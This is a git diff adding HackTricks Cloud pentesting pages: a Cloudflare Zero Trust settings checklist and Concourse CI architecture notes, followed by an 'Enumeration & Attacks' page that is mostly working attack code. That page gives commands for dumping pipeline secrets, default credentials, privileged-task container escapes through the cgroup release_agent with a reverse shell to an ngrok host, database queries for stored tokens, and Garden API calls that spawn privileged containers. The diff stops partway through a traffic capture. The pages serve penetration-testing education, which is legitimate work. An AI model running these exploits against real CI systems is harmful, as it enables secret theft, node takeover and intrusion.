+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+
+<figure><img src="../../.gitbook/assets/image (206).png" alt=""><figcaption></figcaption></figure>
+
+### Analytics
+
+* [ ] Useful to **get to know the environment**
+
+### **Gateway**
+
+* [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications.
+  * If used, **policies** could be created to **restrict** the access to malicious sites.
+  * This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies.
+
+### Access
+
+#### Applications
+
+On each application:
+
+* [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access.
+  * To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also)
+* [ ] Check the **available identity providers** and make sure they **aren't too open**
+* [ ] In **`Settings`**:
+  * [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything)
+  * [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP.
+  * [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.**
+
+#### **Access Groups**
+
+* [ ] Check that the access groups generated are **correctly restricted** to the users they should allow.
+* [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**.
+  * Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary.
+
+#### Service Auth
+
+* [ ] Check that all service tokens **expires in 1 year or less**
+
+#### Tunnels
+
+TODO
+
+### My Team
+
+TODO
+
+### Logs
+
+* [ ] You could search for **unexpected actions** from users
+
+### Settings
+
+* [ ] Check the **plan type**
+* [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address**
+* [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/concourse-security/README.md b/pentesting-ci-cd/concourse-security/README.md
new file mode 100644
index 0000000000..bc438e1de9
--- /dev/null
+++ b/pentesting-ci-cd/concourse-security/README.md
@@ -0,0 +1,59 @@
+# Concourse Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...)
+
+## Concourse Architecture
+
+Learn how the concourse environment is structured in:
+
+{% content-ref url="concourse-architecture.md" %}
+[concourse-architecture.md](concourse-architecture.md)
+{% endcontent-ref %}
+
+## Concourse Lab
+
+Learn how you can run a concourse environment locally to do your own tests in:
+
+{% content-ref url="concourse-lab-creation.md" %}
+[concourse-lab-creation.md](concourse-lab-creation.md)
+{% endcontent-ref %}
+
+## Enumerate & Attack Concourse
+
+Learn how you can enumerate the concourse environment and abuse it in:
+
+{% content-ref url="concourse-enumeration-and-attacks.md" %}
+[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/concourse-security/concourse-architecture.md b/pentesting-ci-cd/concourse-security/concourse-architecture.md
new file mode 100644
index 0000000000..c2a08a80f2
--- /dev/null
+++ b/pentesting-ci-cd/concourse-security/concourse-architecture.md
@@ -0,0 +1,64 @@
+# Concourse Architecture
+
+## Concourse Architecture
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html)
+
+### Architecture
+
+![](<../../.gitbook/assets/image (187).png>)
+
+#### ATC: web UI & build scheduler
+
+The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
+
+The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
+
+#### TSA: worker registration & forwarding
+
+The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
+
+The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer.
+
+The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
+
+#### Workers
+
+In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
+
+* **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**.
+* **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**.
+
+## References
+
+* [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
new file mode 100644
index 0000000000..4cdbcc7d09
--- /dev/null
+++ b/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
@@ -0,0 +1,474 @@
+# Concourse Enumeration & Attacks
+
+## Concourse Enumeration & Attacks
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### User Roles & Permissions
+
+Concourse comes with five roles:
+
+* _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
+* **owner**: Team owners can **modify everything within the team**.
+* **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings.
+* **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
+* **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
+
+{% hint style="info" %}
+Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
+{% endhint %}
+
+Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
+
+### Vars & Credential Manager
+
+In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\
+[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
+The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
+Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
+
+#### Static Vars
+
+Static vars can be specified in **tasks steps**:
+
+```yaml
+  - task: unit-1.13
+    file: booklit/ci/unit.yml
+    vars: {tag: 1.13}
+```
+
+Or using the following `fly` **arguments**:
+
+* `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
+* `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`.
+* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
+* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
+
+#### Credential Management
+
+There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
+Moreover, Concourse supports different credential managers:
+
+* [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
+* [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
+* [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html)
+* [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html)
+* [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html)
+* [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html)
+* [Caching credentials](https://concourse-ci.org/creds-caching.html)
+* [Redacting credentials](https://concourse-ci.org/creds-redacting.html)
+* [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
+
+{% hint style="danger" %}
+Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
+{% endhint %}
+
+### Concourse Enumeration
+
+In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
+
+#### Login and Current User enum
+
+* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
+  * `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
+* Get configured **targets**:
+  * `fly targets`
+* Get if the configured **target connection** is still **valid**:
+  * `fly -t <target> status`
+* Get **role** of the user against the indicated target:
+  * `fly -t <target> userinfo`
+
+{% hint style="info" %}
+Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials.
+{% endhint %}
+
+#### Teams & Users
+
+* Get a list of the Teams
+  * `fly -t <target> teams`
+* Get roles inside team
+  * `fly -t <target> get-team -n <team-name>`
+* Get a list of users
+  * `fly -t <target> active-users`
+
+#### Pipelines
+
+* **List** pipelines:
+  * `fly -t <target> pipelines -a`
+* **Get** pipeline yaml (**sensitive information** might be found in the definition):
+  * `fly -t <target> get-pipeline -p <pipeline-name>`
+* Get all pipeline **config declared vars**
+  * `for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
+* Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them):
+
+```bash
+rm /tmp/secrets.txt;
+for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do 
+    echo $pipename;
+    fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
+    echo "";
+done
+echo ""
+echo "ALL SECRETS"
+cat /tmp/secrets.txt | sort | uniq
+rm /tmp/secrets.txt
+```
+
+#### Containers & Workers
+
+* List **workers**:
+  * `fly -t <target> workers`
+* List **containers**:
+  * `fly -t <target> containers`
+* List **builds** (to see what is running):
+  * `fly -t <target> builds`
+
+### Concourse Attacks
+
+#### Credentials Brute-Force
+
+* admin:admin
+* test:test
+
+#### Secrets and params enumeration
+
+In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them.
+
+#### Session inside running or recently run container
+
+If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `<pipeline>/<job>` **container** using:
+
+```bash
+fly -t tutorial intercept --job pipeline-name/job-name
+fly -t tutorial intercept # To be presented a prompt with all the options
+```
+
+With these permissions you might be able to:
+
+* **Steal the secrets** inside the **container**
+* Try to **escape** to the node
+* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
+
+#### Pipeline Creation/Modification
+
+If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
+
+```yaml
+jobs:
+- name: simple
+  plan:
+  - task: simple-task
+    privileged: true
+    config:
+      # Tells Concourse which type of worker this task should run on
+      platform: linux
+      image_resource:
+        type: registry-image
+        source:
+          repository: busybox # images are pulled from docker hub by default
+      run:
+        path: sh
+        args:
+        - -cx
+        - |
+          echo "$SUPER_SECRET"
+          sleep 1000
+      params:
+        SUPER_SECRET: ((super.secret))
+```
+
+With the **modification/creation** of a new pipeline you will be able to:
+
+* **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`)
+* **Escape** to the **node** (by giving you enough privileges - `privileged: true`)
+* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
+* **Delete** created pipeline
+
+#### Execute Custom Task
+
+This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**):
+
+```yaml
+# For more task_config options check https://concourse-ci.org/tasks.html
+platform: linux
+image_resource:
+  type: registry-image
+  source:
+    repository: ubuntu
+run:
+  path: sh
+  args:
+  - -cx
+  - |
+    env
+    sleep 1000
+params:
+  SUPER_SECRET: ((super.secret))
+```
+
+```bash
+fly -t tutorial execute --privileged --config task_config.yml
+```
+
+#### Escaping to the node from privileged task
+
+In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
+
+In the following PoC we are going to use the release\_agent to escape with some small modifications:
+
+```bash
+# Mounts the RDMA cgroup controller and create a child cgroup
+# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
+# It's because your setup doesn't have the memory cgroup controller, try change memory to rdma to fix it
+mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
+
+# Enables cgroup notifications on release of the "x" cgroup
+echo 1 > /tmp/cgrp/x/notify_on_release
+
+
+# CHANGE ME
+# The host path will look like the following, but you need to change it:
+host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs"
+
+## The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command:
+#/dev/vda1 on /scratch type ext4 (rw,relatime)
+#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime)
+#/dev/vda1 on /etc/hosts type ext4 (rw,relatime)
+#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime)
+
+## Then next part I think is constant "hostpath-provisioner/default/"
+
+## For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed
+# "concourse-work-dir" is constant
+# "concourse-release" is the consourse prefix of the current concourse env (you need to find it from the API)
+# "worker-0" is the name of the worker the container is running in (will be usually that one or incrementing the number)
+
+## The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant
+# running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like:
+# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028
+# the UID is the part we are looking for
+
+# Then the host_path is:
+#host_path="/mnt/<device>/hostpath-provisioner/default/concourse-work-dir-<concourse_prefix>-worker-<num>/overlays/<UID>/rootfs"
+
+# Sets release_agent to /path/payload
+echo "$host_path/cmd" > /tmp/cgrp/release_agent
+
+
+#====================================
+#Reverse shell
+echo '#!/bin/bash' > /cmd
+echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
+chmod a+x /cmd
+#====================================
+# Get output
+echo '#!/bin/sh' > /cmd
+echo "ps aux > $host_path/output" >> /cmd
+chmod a+x /cmd
+#====================================
+
+# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
+sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
+
+# Reads the output
+cat /output
+```
+
+{% hint style="warning" %}
+As you might have noticed this is just a [**regular release\_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node
+{% endhint %}
+
+#### Escaping to the node from a Worker container
+
+A regular release\_agent escape with a minor modification is enough for this:
+
+```bash
+mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
+
+# Enables cgroup notifications on release of the "x" cgroup
+echo 1 > /tmp/cgrp/x/notify_on_release
+host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -n 1`
+echo "$host_path/cmd" > /tmp/cgrp/release_agent
+
+#====================================
+#Reverse shell
+echo '#!/bin/bash' > /cmd
+echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
+chmod a+x /cmd
+#====================================
+# Get output
+echo '#!/bin/sh' > /cmd
+echo "ps aux > $host_path/output" >> /cmd
+chmod a+x /cmd
+#====================================
+
+# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
+sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
+
+# Reads the output
+cat /output
+```
+
+#### Escaping to the node from the Web container
+
+Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
+
+However, it stores **local credentials in clear text**:
+
+```bash
+cat /concourse-auth/local-users
+test:test
+
+env | grep -i local_user
+CONCOURSE_MAIN_TEAM_LOCAL_USER=test
+CONCOURSE_ADD_LOCAL_USER=test:test
+```
+
+You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**.
+
+In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info):
+
+```bash
+env | grep -i postg
+CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
+CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT=5432
+CONCOURSE_RELEASE_POSTGRESQL_SERVICE_PORT_TCP_POSTGRESQL=5432
+CONCOURSE_POSTGRES_USER=concourse
+CONCOURSE_POSTGRES_DATABASE=concourse
+CONCOURSE_POSTGRES_PASSWORD=concourse
+[...]
+
+# Access the postgresql db
+psql -h 10.107.191.238 -U concourse -d concourse
+select * from password; #Find hashed passwords
+select * from access_tokens;
+select * from auth_code;
+select * from client;
+select * from refresh_token;
+select * from teams; #Change the permissions of the users in the teams
+select * from users;
+```
+
+#### Abusing Garden Service - Not a real Attack
+
+{% hint style="warning" %}
+This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
+{% endhint %}
+
+By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections:
+
+* It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker.
+* The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
+
+Concourse workers run with high container privileges:
+
+```
+Container Runtime: docker
+Has Namespaces:
+	pid: true
+	user: false
+AppArmor Profile: kernel
+Capabilities:
+	BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
+Seccomp: disabled
+```
+
+However, techniques like **mounting** the /dev device of the node or release\_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated.
+
+{% hint style="info" %}
+In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**.
+{% endhint %}
+
+Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
+
+**Getting inside a running privileged container**
+
+```bash
+# Get current container
+curl 127.0.0.1:7777/containers
+{"Handles":["ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]}
+
+# Get container info
+curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/info
+curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
+
+# Execute a new process inside a container
+## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
+wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
+  --header='Content-Type:application/json' \
+  'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
+  
+# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
+nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
+```
+
+**Creating a new privileged container**
+
+You can very easily create a new container (just run a random UID) and execute something on it:
+
+```bash
+curl -X POST http://127.0.0.1:7777/containers \
+   -H 'Content-Type: application/json' \
+   -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
+
+# Wget will be stucked there as long as the process is being executed
+wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
+  --header='Content-Type:application/json' \
+  'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
+```
+
+However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers:
+
+```
+GET /containers HTTP/1.1.
+Host: 127.0.0.1:7777.
+User-Agent: Go-http-client/1.1.
+Accept-Encoding: gzip.
+.
+
+T 127.0.0.1:7777 -> 127.0.0.1:59722 [AP] #157
+HTTP/1.1 200 OK.
+Content-Type: application/json.
+Date: Thu, 17 Mar 2022 22:42:55 GMT.
+Content-Length: 131.
+.
+{"Handles":["123ae8fc-47ed-4eab-6b2e-123458880690","ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]}
+
+T 127.0.0.1:59722 -> 127.0.0.1:7777 [AP] #159
